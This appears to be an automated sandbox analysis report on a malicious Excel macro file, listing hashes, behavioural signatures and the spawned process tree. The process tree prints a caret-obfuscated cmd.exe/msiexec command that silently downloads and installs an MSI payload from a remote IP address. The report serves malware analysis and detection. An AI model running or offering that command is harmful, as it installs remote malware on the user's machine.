Analysis

  • max time kernel
    62s
  • max time network
    64s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    30-06-2020 17:58

General

  • Target

    SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls

  • Size

    172KB

  • MD5

    ac016bd363b76505c4b5f55fa92bf343

  • SHA1

    245a98cac3ab0bb615aa265c2774e34c1fcf2bd3

  • SHA256

    95bd7a62ced0c80358c8e3fd12bb8acb9aecea2b35fa43e7a343cb38ae233e5f

  • SHA512

    812ed62c7379e690f3e9af0cde79d1e38e5ed0971f98f0662584ea885e03bc8b36e31dfc7c54a2be2f5989605ff59e6d53a4e4b7f875fff0f8ac9dc40bdbb7c2

Score
10/10

Malware Config

Signatures

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Use of msiexec (install) with remote resource 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Blacklisted process makes network request 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Heur.Macro.Generic.h.4bdfa2fa.9877.xls
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1196
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c ms^iE^x^ec /i http://199.195.250.60/gg/new-order0456.msi /qn
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1500
      • C:\Windows\system32\msiexec.exe
        msiExec /i http://199.195.250.60/gg/new-order0456.msi /qn
        3⤵
        • Use of msiexec (install) with remote resource
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious use of AdjustPrivilegeToken
        PID:908
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Blacklisted process makes network request
    PID:640

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/908-3-0x0000000000000000-mapping.dmp
  • memory/908-4-0x0000000002320000-0x0000000002324000-memory.dmp
    Filesize

    16KB

  • memory/1196-0-0x0000000006180000-0x0000000006280000-memory.dmp
    Filesize

    1024KB

  • memory/1196-1-0x0000000006180000-0x0000000006280000-memory.dmp
    Filesize

    1024KB

  • memory/1500-2-0x0000000000000000-mapping.dmp